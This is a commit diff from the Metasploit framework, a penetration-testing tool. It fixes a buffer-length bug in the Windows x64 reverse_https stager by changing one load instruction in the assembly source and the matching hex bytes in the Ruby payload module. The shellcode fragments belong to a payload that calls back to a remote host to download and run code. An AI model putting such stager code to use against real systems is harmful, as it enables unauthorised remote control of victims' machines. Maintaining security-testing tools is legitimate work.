Lands rapid7#4949 which fixes rapid7#4845

HD Moore · HD Moore · commit 0d1f2055c582 · 2015-03-18T15:31:22.000-05:00
diff --git a/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm
@@ -145,7 +145,7 @@ download_more:
   test eax,eax           ; download failed? (optional?)
   jz failure
 
-  mov rax, [rdi]
+  mov ax, word ptr [edi]
   add rbx, rax           ; buffer += bytes_received
 
   test rax,rax           ; optional?
diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -85,7 +85,7 @@ def initialize(info = {})
             "\xA4\x53\xE5\x00\x00\x00\x00\xFF\xD5\x48\x93\x53\x53\x48\x89\xE7" +
             "\x48\x89\xF1\x48\x89\xDA\x49\xB8\x00\x20\x00\x00\x00\x00\x00\x00" +
             "\x49\x89\xF9\x49\xBA\x12\x96\x89\xE2\x00\x00\x00\x00\xFF\xD5\x48" +
-            "\x83\xC4\x20\x85\xC0\x74\x99\x48\x8B\x07\x48\x01\xC3\x48\x85\xC0" +
+            "\x83\xC4\x20\x85\xC0\x74\x99\x66\x8B\x07\x48\x01\xC3\x48\x85\xC0" +
             "\x75\xCE\x58\x58\xC3" +
             "\xE8\xD7\xFE\xFF\xFF" #updated jump offset
         }

Original file line number	Diff line number	Diff line change
`@@ -85,7 +85,7 @@ def initialize(info = {})`
`85`	`85`	`"\xA4\x53\xE5\x00\x00\x00\x00\xFF\xD5\x48\x93\x53\x53\x48\x89\xE7" +`
`86`	`86`	`"\x48\x89\xF1\x48\x89\xDA\x49\xB8\x00\x20\x00\x00\x00\x00\x00\x00" +`
`87`	`87`	`"\x49\x89\xF9\x49\xBA\x12\x96\x89\xE2\x00\x00\x00\x00\xFF\xD5\x48" +`
`88`		`- "\x83\xC4\x20\x85\xC0\x74\x99\x48\x8B\x07\x48\x01\xC3\x48\x85\xC0" +`
	`88`	`+ "\x83\xC4\x20\x85\xC0\x74\x99\x66\x8B\x07\x48\x01\xC3\x48\x85\xC0" +`
`89`	`89`	`"\x75\xCE\x58\x58\xC3" +`
`90`	`90`	`"\xE8\xD7\xFE\xFF\xFF" #updated jump offset`
`91`	`91`	`}`